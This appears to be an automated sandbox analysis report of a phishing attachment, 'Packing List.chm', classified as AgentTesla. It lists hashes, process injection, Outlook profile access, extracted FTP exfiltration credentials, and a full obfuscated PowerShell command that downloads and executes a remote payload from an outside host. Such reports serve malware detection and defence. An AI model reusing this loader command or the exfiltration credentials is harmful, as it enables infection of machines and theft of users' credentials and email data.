Analysis
-
max time kernel
91s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
02-10-2022 20:23
Static task
static1
Behavioral task
behavioral1
Sample
fwdPacking List (8.76 KB).msg
Resource
win10v2004-20220812-en
Behavioral task
behavioral2
Sample
Packing List.chm
Resource
win10v2004-20220812-en
General
-
Target
Packing List.chm
-
Size
13KB
-
MD5
08cac56b75979c1f3bfc2e83e123a2fc
-
SHA1
56227c920783d547a673e0de919f438dba846c01
-
SHA256
11731e8a97c3ced6e50ffa011b04bc6b54cc5e4ee1ccf2c4fc70247b7ae4528b
-
SHA512
3be2746d1a0179642db2e7a85ba5cb4815e95582e56efb3e981755ecc50fc6590d425993bfb8f3685d3d79871ec88c597c545850929595c04abb60690169ac4b
-
SSDEEP
192:tyBAu4E8Y/p6efAPaiQ4nggjClAgLZkByk0GAN:tyauqYR8s4ggjCb5k0
Malware Config
Extracted
https://mgcpakistan.com/yimu.txt
Extracted
Protocol: ftp- Host:
ftp.onogost.com - Port:
21 - Username:
infoo@onogost.com - Password:
boygirl123456
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 13 4148 powershell.exe -
Loads dropped DLL 1 IoCs
Processes:
powershell.exepid process 4148 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
aspnet_compiler.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4148 set thread context of 2968 4148 powershell.exe aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeaspnet_compiler.exepid process 4148 powershell.exe 4148 powershell.exe 2968 aspnet_compiler.exe 2968 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 4148 powershell.exe Token: SeIncreaseQuotaPrivilege 4148 powershell.exe Token: SeSecurityPrivilege 4148 powershell.exe Token: SeTakeOwnershipPrivilege 4148 powershell.exe Token: SeLoadDriverPrivilege 4148 powershell.exe Token: SeSystemProfilePrivilege 4148 powershell.exe Token: SeSystemtimePrivilege 4148 powershell.exe Token: SeProfSingleProcessPrivilege 4148 powershell.exe Token: SeIncBasePriorityPrivilege 4148 powershell.exe Token: SeCreatePagefilePrivilege 4148 powershell.exe Token: SeBackupPrivilege 4148 powershell.exe Token: SeRestorePrivilege 4148 powershell.exe Token: SeShutdownPrivilege 4148 powershell.exe Token: SeDebugPrivilege 4148 powershell.exe Token: SeSystemEnvironmentPrivilege 4148 powershell.exe Token: SeRemoteShutdownPrivilege 4148 powershell.exe Token: SeUndockPrivilege 4148 powershell.exe Token: SeManageVolumePrivilege 4148 powershell.exe Token: 33 4148 powershell.exe Token: 34 4148 powershell.exe Token: 35 4148 powershell.exe Token: 36 4148 powershell.exe Token: SeIncreaseQuotaPrivilege 4148 powershell.exe Token: SeSecurityPrivilege 4148 powershell.exe Token: SeTakeOwnershipPrivilege 4148 powershell.exe Token: SeLoadDriverPrivilege 4148 powershell.exe Token: SeSystemProfilePrivilege 4148 powershell.exe Token: SeSystemtimePrivilege 4148 powershell.exe Token: SeProfSingleProcessPrivilege 4148 powershell.exe Token: SeIncBasePriorityPrivilege 4148 powershell.exe Token: SeCreatePagefilePrivilege 4148 powershell.exe Token: SeBackupPrivilege 4148 powershell.exe Token: SeRestorePrivilege 4148 powershell.exe Token: SeShutdownPrivilege 4148 powershell.exe Token: SeDebugPrivilege 4148 powershell.exe Token: SeSystemEnvironmentPrivilege 4148 powershell.exe Token: SeRemoteShutdownPrivilege 4148 powershell.exe Token: SeUndockPrivilege 4148 powershell.exe Token: SeManageVolumePrivilege 4148 powershell.exe Token: 33 4148 powershell.exe Token: 34 4148 powershell.exe Token: 35 4148 powershell.exe Token: 36 4148 powershell.exe Token: SeDebugPrivilege 2968 aspnet_compiler.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 4868 hh.exe 4868 hh.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
hh.exepowershell.exedescription pid process target process PID 4868 wrote to memory of 4148 4868 hh.exe powershell.exe PID 4868 wrote to memory of 4148 4868 hh.exe powershell.exe PID 4148 wrote to memory of 2968 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 2968 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 2968 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 2968 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 2968 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 2968 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 2968 4148 powershell.exe aspnet_compiler.exe PID 4148 wrote to memory of 2968 4148 powershell.exe aspnet_compiler.exe -
outlook_office_path 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe -
outlook_win_path 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\Packing List.chm"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://mgcpakistan.com/yimu.txt')|P2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\73ab9a28-0688-49e7-b77d-eacdd07237df\AgileDotNetRT64.dllFilesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
memory/2968-142-0x0000000005510000-0x0000000005AB4000-memory.dmpFilesize
5.6MB
-
memory/2968-143-0x0000000004E90000-0x0000000004F2C000-memory.dmpFilesize
624KB
-
memory/2968-147-0x0000000006850000-0x000000000685A000-memory.dmpFilesize
40KB
-
memory/2968-146-0x00000000068D0000-0x0000000006962000-memory.dmpFilesize
584KB
-
memory/2968-145-0x0000000006170000-0x00000000061C0000-memory.dmpFilesize
320KB
-
memory/2968-140-0x0000000000435A6E-mapping.dmp
-
memory/2968-139-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/2968-144-0x0000000005AC0000-0x0000000005B26000-memory.dmpFilesize
408KB
-
memory/4148-138-0x00007FFA8C880000-0x00007FFA8C9CE000-memory.dmpFilesize
1.3MB
-
memory/4148-133-0x0000000000000000-mapping.dmp
-
memory/4148-141-0x00007FFA91B00000-0x00007FFA925C1000-memory.dmpFilesize
10.8MB
-
memory/4148-135-0x00007FFA91B00000-0x00007FFA925C1000-memory.dmpFilesize
10.8MB
-
memory/4148-134-0x000002974F1D0000-0x000002974F1F2000-memory.dmpFilesize
136KB
-
memory/4148-136-0x00007FFA91B00000-0x00007FFA925C1000-memory.dmpFilesize
10.8MB